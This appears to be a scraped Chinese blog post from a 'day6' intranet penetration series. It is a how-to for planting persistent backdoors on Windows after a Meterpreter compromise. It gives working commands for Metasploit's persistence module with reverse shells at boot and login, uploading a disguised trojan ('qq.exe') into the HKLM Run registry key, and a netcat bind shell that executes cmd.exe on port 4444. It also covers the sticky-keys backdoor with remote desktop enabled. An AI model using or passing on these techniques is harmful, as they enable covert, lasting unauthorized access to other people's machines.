后门植入

1. 持续化后门

在提权后的meterpreter下执行persistence命令

内网渗透 day6-msf后门植(windows)

run persistence -i 5 -U -X

-A 自动匹配监听器连接用户

-S 系统开启的时候作为服务自动运行,反弹shell

-U 在用户登入的时候反弹shell

-X 系统开启的时候返回shell

-i 间隔几秒中反弹

-p 指定监听的端口

-r 设定回连的ip

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

win7重启后成功连接

内网渗透 day6-msf后门植(windows)

2. 手动上传木马并加入注册表中

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

重启后登陆自动连接

内网渗透 day6-msf后门植(windows)

meterpreter > upload qq.exe c:           将木马文件上传到目标机的C盘(可以隐蔽一些)

reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -v shell -d 'c:\qq.exe' -f                     将木马文件写入注册表

reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -v shell                                  查看

3. 上传nc

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

win7重启后自动开启nc.exe

内网渗透 day6-msf后门植(windows)内网渗透 day6-msf后门植(windows)

upload nc.exe c:

reg add HKLM\software\microsoft\windows\currentversion\run /v shell /d "C:\nc.exe -l -v -v -p 4444 -e c:\windows\system32\cmd.exe"              cmd下运行

4. 开3389-->shift后门-->远程登入

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

按5次shift调出改过的粘滞键后门

run post/windows/manage/enable_rdp          开启3389端口

rdesktop 192.168.227.128            远程登录

5. at调用

内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)内网渗透 day6-msf后门植(windows)

内网渗透 day6-msf后门植(windows)

相关文章:

  • 2022-12-23
  • 2021-11-27
  • 2022-01-10
  • 2022-01-12
  • 2022-01-17
  • 2021-06-25
  • 2021-06-28
  • 2021-10-18
猜你喜欢
  • 2021-07-20
  • 2021-11-01
  • 2021-11-02
  • 2022-12-23
  • 2021-11-20
  • 2021-12-31
  • 2021-09-15
相关资源
相似解决方案